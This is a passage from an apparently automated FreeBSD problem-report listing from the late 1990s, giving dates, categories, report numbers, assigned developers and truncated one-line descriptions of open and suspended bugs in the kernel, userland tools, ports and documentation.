CD-ROM for fixit mode. o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/16] ports/12660imp Fix for gethostbyname2() problem when usi o [1999/07/16] gnu/12662 tar verification doesn't work in 3.2-RELE o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] ports/12714ports dylan port doesn't compile o [1999/07/20] bin/12727 Game patches from NetBSD f [1999/07/20] misc/12728 ru Natd on 3.2-R doesn't work with certain w o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/21] ports/12746ache problem with bash-2.03(1) port (/usr/port o [1999/07/21] i386/12749 marcel Bug in link() and all other filename func o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/26] alpha/12821alpha slib.aq for the 3.2-RELEASE alpha distrib o [1999/07/26] ports/12824dirk MySQL client only compile doesn't check t o [1999/07/27] kern/12831 sos CD-rom cannot be mounted o [1999/07/27] conf/12832 config -g creates broken Makefile in 3.2- o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/27] bin/12847 [PATCH] Fix for "Proxy ARP" o [1999/07/28] misc/12856 installworld over nfs broken (3.2S) o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/07/30] kern/12884 Hot to panic FreeBSD-3.2-Release o [1999/07/31] ports/12905ports Graphical setup utility won't always inst o [1999/08/01] bin/12911 alfred NFS umounts are not properly done if just o [1999/08/01] bin/12912 [PATCH] lpd leaves lock file permissions o [1999/08/02] kern/12927 [PATCH] using BROKEN_KEYBOARD_RESET optio o [1999/08/02] ports/12930ports libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/03] ports/12949ports Fix for rtsp_proxy port. Patches from Jon o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] conf/12984 /etc/rc* does not contain any support for f [1999/08/05] docs/12988 doc [Patch] Fix more occurances of 'sd' in FA o [1999/08/05] kern/12991 system queue is cleared when a port or pi o [1999/08/06] kern/12996 ifconf in sys/net/if.c returns larger buf o [1999/08/06] ports/13001ports Security update for ja-groff-0.99 :japane o [1999/08/06] bin/13008 pthread_kill does not always work o [1999/08/07] conf/13013 Selecting CDROM as install media doesn't o [1999/08/08] kern/13022 ipfilter is out-of-date o [1999/08/08] misc/13027 sysinstall has no /dev entry for wfd0s4 ( o [1999/08/08] ports/13033ports windowmaker port patch for single icon mo o [1999/08/09] kern/13049 [PATCH] NFS replies with incorrect source o [1999/08/09] ports/13052ports stunnel compile fails on new system o [1999/08/10] i386/13058 Installation hangs after commit o [1999/08/11] docs/13088 doc Handbook lists support for Adaptec 2930, o [1999/08/13] ports/13114ports [patch] security and file owner/group fix o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/14] ports/13145ports kaudioserver runs amok on logout o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] ports/13158ports IMAP-uw is not up to date o [1999/08/15] ports/13170ports new port: UW-Imap with maildir and qmail o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/16] bin/13184 rc file expects /var/msgs directory to ex o [1999/08/17] kern/13196 [BTX] page in BTX has problem(quit key) o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/17] misc/13202 Easy for user to crash system o [1999/08/18] kern/13219 Adaptek Driver o [1999/08/18] kern/13234 .../netinet/ip_input.c should include opt o [1999/08/19] misc/13261 ftpd mishandles STAT command during a fil o [1999/08/21] bin/13286 [SECURITY] Potential IPXrouted(8) /tmp se o [1999/08/21] bin/13292 Ping -s does not work o [1999/08/23] ports/13334ports remote scanning can cause argus to dump c o [1999/08/24] ports/13347ports hang system o [1999/09/04] ports/13573ports update mrtg to 2.8.8 o [1999/09/05] kern/13587 Voxware MIXER_READ ioctl corrupts memory o [1999/09/06] kern/13593 Problems with FIFO and select 642 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/01/11] i386/105 bde Distributed libm (msun) has non-standard s [1995/05/13] bin/401 Add REMOTE_* variables s [1995/06/15] bin/517 Bad group change with 'install' o [1995/07/09] misc/605 wpaul NIS: get*bynis routine problems s [1995/08/05] gnu/655 ld -r of shared objects worked in 1.1.5, s [1995/08/07] bin/658 ifconfig alias has to be separately given s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/10/03] kern/765 umount -f can`t umount a NFS filesystem i s [1995/11/20] kern/831 one minor complaint about the kernel visu s [1995/11/27] bin/841 stale nfs mounts cannot be umounted o [1995/11/30] bin/854 dg swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] kern/1090 iostat displays incorrect sps count s [1996/03/20] bin/1093 route's diagnostic is weird o [1996/04/06] kern/1119 dg Mounted EXT2FS partition is not cleanly u s [1996/06/11] bin/1312 automounter hangs on boot s [1996/06/13] bin/1320 dump limits blocksize to 32K s [1996/07/07] bin/1375 jraynard Extraneous warning from mv(1) [PATCH] o [1996/07/24] misc/1428 ncurses doesn't always display ALTCHARSET o [1996/09/06] bin/1577 peter mail -f foo does not look in current dire s [1996/09/08] bin/1589 [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize s [1996/09/19] kern/1654 [PATCH] In procfs, vattr doesn't contain o [1996/09/23] i386/1671 joerg s2 map in pcvt isn't ISO 8859-1 and claim s [1996/10/13] misc/1791 syslimits.h does not allow overriding def o [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/10/24] bin/1881 file(1) misidentifies Sun3/m68k executabl s [1996/11/01] bin/1941 danny wtmp and monthly rotation s [1996/11/01] bin/1943 route(8) args o [1996/11/04] i386/1953 sos syscons savers have no default timeout s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/06] bin/1970 csh limtail() bug s [1996/11/16] bin/2036 cpio size wraparound s [1996/11/19] bin/2061 DEBUG_FLAGS in bsd.lib.mk is broken s [1996/11/19] bin/2065 in tzsetup/sysinstall, allow user to type s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/11/28] bin/2119 [PATCH] mount lies to child about argv0, s [1996/12/02] bin/2137 vm statistics are bad s [1996/12/12] kern/2199 joerg [PATCH] Got a lots of "Target Busy" messa s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/17] i386/2239 jmg some interrupts take too long (i.e. BT946 a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1996/12/29] bin/2315 peter tail segfaults on NFS permission denied s [1996/12/30] kern/2327 [PATCH] `Green' saver for pcvt o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/14] kern/2492 AIMS Lab RadioTrack driver for FreeBSD 2. o [1997/01/26] i386/2598 ep0 in EISA mode hangs if ep0-device (ISA o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/01/28] bin/2604 dufault Added POSIX.4/POSIX.1b shm_open()/shm_unl o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/05] bin/2668 modification suggested for rarpd o [1997/02/11] kern/2716 od.c/sd.c non 512 byte/sector support imp o [1997/02/14] bin/2737 yppasswd fails to change password on a su o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2857 DE500 board exhibits capture effect o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/06] docs/2897 steve send-pr categories should be explained so o [1997/03/06] bin/2898 fenner arp -a -n buglet o [1997/03/10] bin/2934 sh(1) has problems with $ENV o [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/18] misc/3024 make reinstall in /usr/src requires writa o [1997/03/22] kern/3061 route does not accept -genmask o [1997/03/31] gnu/3157 Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/08] misc/3237 SCRIPTS addition to bsd.prog.mk o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] kern/3281 errors when "rm -r"-ing in a mounted ext2 o [1997/04/14] kern/3282 ext2fs causes fs-unmount at shutdown/rebo o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo o [1997/04/14] bin/3286 [PATCH] missing error checking in mount_m o [1997/04/14] kern/3287 [PATCH] missing symbols in /usr/src/sys/i o [1997/04/15] kern/3299 /dev/console hangs o [1997/04/17] bin/3314 [PATCH] /etc/daily did not run on April 6 o [1997/04/27] bin/3399 mv of symbolic link can move directory in o [1997/04/29] bin/3416 ibcs emulation problems o [1997/05/05] i386/3504 [PATCH] New features (and manpage) for ne o [1997/05/08] gnu/3552 the -L option of tar does not work proper s [1997/05/09] kern/3571 Mounted ext2 prevents umount of filesyste o [1997/05/12] kern/3584 luigi cleanup TCP_REASS macro in tcp_input.c o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/05/17] kern/3611 Internal CPU cache on CyrixiInstead DX2 d o [1997/05/18] gnu/3616 permissions of /usr/libexec/uucp/uuxqt no o [1997/05/20] docs/3645 torstenb TCP_wrappers package doesn't mention wher s [1997/05/21] bin/3648 roberto [PATCH] find(1) extension for file flags s [1997/05/22] kern/3667 [PATCH] make vn LKM'able. o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) o [1997/06/07] bin/3805 single process tftpd o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/12] kern/3853 luigi netboot/ns8390.c breaks NS datasheet o [1997/06/14] bin/3866 rcs2log fails with eastern timezones o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/18] kern/3901 Multicast for Intel 10/100 Ethernet Card o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/23] kern/3938 peter Problem about mmap() over NFS o [1997/06/24] kern/3944 if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 nonworking t/tcp server side a [1997/06/25] kern/3953 kern-config: options PANIC_REBOOT_WAIT_TI o [1997/06/26] i386/3962 print disk internal cache size during pro o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/06/29] ports/3983 fenner New port: psf toolkit o [1997/07/07] kern/4051 pppd connect 'chat ...' broken s [1997/07/07] kern/4052 VJ compression drops packets with IP+TCP o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to o [1997/07/23] kern/4153 New tcp initial send sequence number code s [1997/07/23] bin/4154 wish /bin/sleep handled fractions of a se s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print s [1997/07/26] bin/4172 suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/04] conf/4229 Ethernet interface unreachable on bootup o [1997/08/06] bin/4238 chpass only occasionally works in conjunc o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/07] bin/4247 modification to /etc/security for FreeBSD o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 asami Recommendation re. Ports Collection o [1997/08/22] ports/4356 erich sudo shouldn't block signals in tgetpass( o [1997/08/23] conf/4363 kernel build depend on make obj o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/04] misc/4468 dlopen is not available from static execu o [1997/09/07] bin/4484 peter sendmail is barfing o [1997/09/13] kern/4528 processes hang if the mount_portal proces a [1997/09/14] i386/4538 sos byteswapped ATAPI id strings o [1997/09/14] bin/4545 f77 will only call `cc', no com-line opti s [1997/09/15] i386/4547 luigi asc.c and pcaudio.c should use selrecord o [1997/09/16] misc/4556 make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c o [1997/09/21] kern/4601 Contrib: userconfig patch to edit SCSI co o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/09/29] conf/4654 Need to do post-ifconfig commands o [1997/10/04] bin/4688 peter sys/utsname.h SYS_NMLN 32 too small o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/05] bin/4697 make doesn't handle dependencies with for o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/10/24] kern/4847 pccard stuff fails after running Win95 wi o [1997/11/01] bin/4915 peter NFS mounts to linux machine can hang syst o [1997/11/02] bin/4923 vi leaves the screen in standout mode o [1997/11/07] bin/4969 cdcontrol plays incorrect audio tracks in o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/09] kern/4992 SCSI disk scheduling disabled in 2.2.5 o [1997/11/10] kern/4997 DDB_UNATTENDED doesn't always work o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/11] kern/5011 rndcontrol -s 8 causes kernel panic o [1997/11/13] bin/5031 lpr does not remove original file if -s i o [1997/11/13] ports/5034 ache (tcsh) blocked write on named pipe sticks o [1997/11/14] gnu/5039 libdialog fails to resore terminal o [1997/11/14] kern/5040 Support for "SCSI-0" devices o [1997/11/14] kern/5048 Calling shutdown(fd,1) multiple times wil o [1997/11/15] kern/5059 peter mountd, nfsd, etc. fail when lp0 defined o [1997/11/15] kern/5060 Kernel doesn't compile with mss o [1997/11/20] kern/5108 pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 kernel crash & core in pmap_testbit durin o [1997/11/23] bin/5134 cdcontrol will eject a mounted CDROM o [1997/11/26] misc/5153 jkh release file checksums in wrong file s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial o [1997/12/09] bin/5263 sh bug (with example) s [1997/12/11] kern/5275 [PATCH] Added volume (barcode) support to o [1997/12/14] conf/5292 master.passwd -- /nonexistent vs. /sbin/n s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp f [1997/12/30] i386/5398 silo overflows running o [1998/01/02] bin/5410 pkg_info options s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/08] kern/5429 Ethernet collision during file transfers s [1998/01/08] kern/5435 [PATCH] if_fe.c for old Gateway Communica s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry o [1998/01/15] kern/5502 nfsd process usage doesn't get accounted o [1998/01/15] kern/5508 SCSI Message sd0: COMMAND FAILED (4 28) @ s [1998/01/16] kern/5510 sos [PATCH] Incomplete ATAPI diagnostic at bo o [1998/01/18] kern/5517 Recursive NULLFS mount causes ufs_ihashge s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/21] bin/5537 vi dumps core with dodgy exrc file o [1998/01/24] i386/5559 PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 lpd cannot send long files to HP's JetDir a [1998/02/02] ports/5626 billf 'ldap' port eats all available CPU time o [1998/02/02] kern/5627 Tertiary/Quaternary IDE Ctlrs: A few kern f [1998/02/05] misc/5662 sysinstall generates short dev names for o [1998/02/06] bin/5666 ifconfig fails to add alias o [1998/02/06] kern/5672 Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5711 bin/cat code cleanup o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/10] bin/5717 pw -D -g "" returns error o [1998/02/10] bin/5718 pkg_delete refuses to run as non-root o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/14] bin/5746 bootparamd will not netboot sun 3 compute o [1998/02/14] bin/5747 ld.so error message o [1998/02/15] bin/5758 sys/resources.h doesn't include sys/time. o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/19] ports/5788 joerg pcemu harddisk-access fixes o [1998/02/19] kern/5789 wcd0 requires ATAPI_STATIC o [1998/02/19] kern/5795 Panic: "bremfree: removing a buffer when o [1998/02/20] misc/5803 "tab" function from "ee" not compatible w o [1998/02/25] gnu/5841 installmost or install (world) of tmac fa o [1998/02/25] bin/5847 Makeworld fails if CXXFLAGS is set. s [1998/02/25] misc/5855 /etc/services is out of date with IANA o [1998/02/26] bin/5857 non-functional lpr/lpr o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/01] bin/5880 df -t does not support devfs o [1998/03/01] ports/5884 dburr New port: icqjava-0.981a (net/icqjava) o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max o [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/08] bin/5944 cvs doesn't work correct. o [1998/03/10] kern/5964 peter nfsd send interface selection seems broke o [1998/03/10] bin/5966 vi's spanish message catalog does not use o [1998/03/10] ports/5972 andreas x11/fvwm95 requiring gsm, and rplay is a o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/12] gnu/5992 cvs y2k o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne o [1998/03/16] kern/6032 poor TCP performance using FDDI over long o [1998/03/18] misc/6060 peter Sendmail executable, not doing MASQUERADE o [1998/03/22] conf/6096 /sys/i386/conf/LINT: edit(???) sound_conf o [1998/03/22] gnu/6107 gdb should support PRINTF_HAS_LONG_LONG o [1998/03/28] bin/6156 Patches to make dump understand ENOSPC o [1998/03/28] bin/6161 2.2.6 kerberos servers are awfully visibl o [1998/03/29] ports/6170 peter another squid ports o [1998/03/30] ports/6181 dburr New port: xoj-1.0 o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/01] bin/6187 peter mounting nfs directories with -b can caus o [1998/04/03] bin/6200 flex can be upgraded o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/03] bin/6206 Enhancements to the shutdown program o [1998/04/04] kern/6213 peter NFS-mounted swap (via vnconfig) easily cr o [1998/04/04] bin/6214 ping sometimes cannot be killed with a Co o [1998/04/05] conf/6220 Too few ttyv devices in the -RELEASE syst s [1998/04/06] bin/6223 PST/DST bug in /bin/date o [1998/04/06] ports/6230 rse gfont_mkgdf calls wrong interpreter o [1998/04/06] bin/6234 ypserv -d is broken f [1998/04/07] kern/6247 Gravis UltraSound Classic no longer works o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to a [1998/04/14] kern/6299 vmstat -i does not show PnP device interr s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification s [1998/04/16] ports/6315 kuriyama new port request: korean/htm o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to o [1998/04/20] bin/6359 routed does sent router discovry solicita s [1998/04/20] bin/6371 [PATCH?] fetch(1) uses HTTP_PROXY for ftp a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf o [1998/04/28] ports/6445 jkoshy New port: `fhist' o [1998/04/30] kern/6464 tcpdump doesn't recognize tun0 when it's o [1998/05/03] kern/6495 Need pci_unmap_mem and pci_unmap_port rou s [1998/05/04] bin/6509 [ALMOST PATCH] Allow dd to seek/skip to o s [1998/05/05] bin/6521 [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/07] ports/6546 ache 3line ansi prompt in tcsh: cursor disappe o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/16] bin/6658 [PATCH] -stable getcwd(3) performs unnece s [1998/05/17] kern/6668 [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c o [1998/05/26] kern/6760 can't compile kernel w/o networking o [1998/05/26] kern/6769 peter panic: nfs rcvunlock s [1998/05/29] kern/6781 [PATCH] exabyte changer doesn't grok LUNs s [1998/05/29] bin/6785 place for all the default dump flags f [1998/05/31] ports/6813 fenner patched audio module for vat port o [1998/06/01] ports/6815 torstenb ssh lookup ignores second IP address o [1998/06/01] kern/6820 cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 sysinstall: install from MS-DOS MO divece o [1998/06/18] kern/6981 CD unmount w/o CD in drive can cause pani s [1998/06/19] bin/6995 [patch] Minor flaw in fdformat s [1998/06/19] bin/6997 [patch] vnconfig "open" error message con s [1998/06/21] kern/7014 [PATCH][STABLE] Add support for SiS 5591 o [1998/06/22] bin/7021 asami Size estimation patches to pkg_* o [1998/06/22] bin/7022 asami changes to bsd.port.mk to accompany PR bi o [1998/06/22] bin/7023 asami bsd.port.(%|subdir.).mk patches for size f [1998/06/23] kern/7029 gibbs cdrecord and aic7880 troubles f [1998/06/23] i386/7031 Our RocketPort port does not support DEVF s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br f [1998/06/25] bin/7068 markm /usr/bin/perl: library path addition s [1998/06/28] kern/7095 [stable] Gravis MAX in 2.2.6 suffers from s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/06/29] bin/7117 flex -I option is broken s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/02] kern/7146 The PCCARD doesnt recognize cards in top s [1998/07/06] bin/7184 /usr/games/robots fails to write high sco s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel f [1998/07/10] misc/7239 ping(8) and traceroute(8) may report erra o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 asami MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/14] ports/7283 ache tcsh / LC_CTYPE - obscure problem. o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad o [1998/07/21] bin/7352 libc generates spurious warnings when use a [1998/07/23] ports/7375 dburr New port request: audio/xsplay f [1998/07/23] kern/7377 we have a new digiboard driver supporting s [1998/07/29] i386/7426 Bugs in macro definitions of pthreads. a [1998/07/31] docs/7456 doc dialog(3) man page outdated o [1998/08/01] ports/7464 dburr New port: WMakerconf o [1998/08/03] ports/7485 ports New port: Xterminal-0.2 s [1998/08/09] kern/7546 [PATCH] [STABLE ?]shutdown -p - system po f [1998/08/12] kern/7589 Tulip Driver parses SROM contents wrong f [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace o [1998/08/14] kern/7619 odd nfs server not responding messages ap o [1998/08/16] ports/7628 dburr new port: sajber-jukebox o [1998/08/16] bin/7632 Race condition in /stand/sysinstall f [1998/08/16] i386/7633 panic: page fault on install with boot.fl o [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] ports/7680 billf New port of tn5250 o [1998/08/19] gnu/7687 description of default baud rate for cu c o [1998/08/20] kern/7693 Misleading warning in cblock_alloc_cblock o [1998/08/20] bin/7694 bogus error-message from route(8) o [1998/08/22] kern/7722 Changes to acct format o [1998/08/23] bin/7728 ftpd processes hang o [1998/08/27] bin/7753 arp command fails silently on invalid pro o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/08/29] ports/7774 torstenb sshd doesn't refuse to login people with o [1998/08/29] bin/7779 [PATCH] modload should detect stripped ke o [1998/08/30] kern/7782 Kernel rebuild not correctly responding t o [1998/08/30] bin/7786 quota.h has superfluous semicolon in macr a [1998/08/31] docs/7791 doc ipf(1) and ipfstat(1) should have been ip o [1998/09/01] gnu/7800 tar(1) does not recognize --gunzip option o [1998/09/02] i386/7816 dfr [Patch] NE2000 PnP card IDs to sys/i386/i o [1998/09/03] bin/7826 ls(1) knows too much about format of strf o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/07] ports/7845 tg Unbuffered /dev/vx0-output from Python 1. o [1998/09/07] bin/7846 /sbin/mount_* do not canonicalize the mou o [1998/09/07] misc/7850 lt_LT.* locale o [1998/09/07] kern/7856 Patches to add lkm hooks to cmsg_data anc o [1998/09/08] bin/7860 Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/08] bin/7869 Improved error messages from apm o [1998/09/09] misc/7873 poor initial configuration and documentat o [1998/09/11] bin/7895 multiple identical NFS mounts accepted o [1998/09/11] kern/7903 unmatched '{}' blocks. o [1998/09/13] docs/7914 doc no elf(5) manpage o [1998/09/15] ports/7932 torstenb man zshall doesn't work o [1998/09/16] misc/7946 ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac o [1998/09/20] bin/7998 pkg_add seems to have unneeded umask o [1998/09/20] misc/8005 yokota Keyboard freezes going from KDE to text m o [1998/09/21] kern/8015 [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 asami [PATCH] Add multiple CDROM support to bsd o [1998/09/29] bin/8084 NIT: non-working code in rshd o [1998/10/02] i386/8131 [patch] Support for PCI NE2000 compatible o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/03] bin/8134 End of game is not recognised immediately o [1998/10/03] misc/8139 [patch] missing /usr/src/share/examples/d o [1998/10/04] bin/8142 freebsd 2.2.7 implementation of key(1) [s o [1998/10/04] i386/8146 [patch] kzipboot serial console setup and a [1998/10/06] bin/8163 [patch] It is impossible to assign quotas o [1998/10/06] bin/8164 [patch] repquota incorrectly reports quot o [1998/10/06] i386/8171 [patch] Intel EtherExpress Pro 100 suppor o [1998/10/07] misc/8202 semop() is not wrapped for thread safety o [1998/10/08] bin/8211 Script to search kernel for an address o [1998/10/12] bin/8295 order of options in printcap causes some o [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] bin/8347 /usr/lib/compat build issues in 3.0 RELEA o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore f [1998/10/17] misc/8357 Segmentation fault while making SWARM-1.3 o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/19] misc/8378 Is termcap not maintained enough ? o [1998/10/22] kern/8420 __getcwd() from an (forcibly) unmounted f o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/25] kern/8444 hm pcvt with more than 8 virtual consoles o [1998/10/25] docs/8445 doc Update of "Installing Mathematica on Free o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/10/30] bin/8501 snake has a segmentation fault depending o [1998/10/30] conf/8517 rc.conf/rc fails to set ldconfig -aout o [1998/10/31] misc/8519 Murphy's Laws o [1998/11/01] conf/8531 sysinstall on 3.0-RELEASE (and 3.0-curren o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/04] i386/8571 Bug in config utility in FreeBSD 2.2.6-RE o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/07] i386/8598 MAKEDEV fails if not run from current dir o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/08] 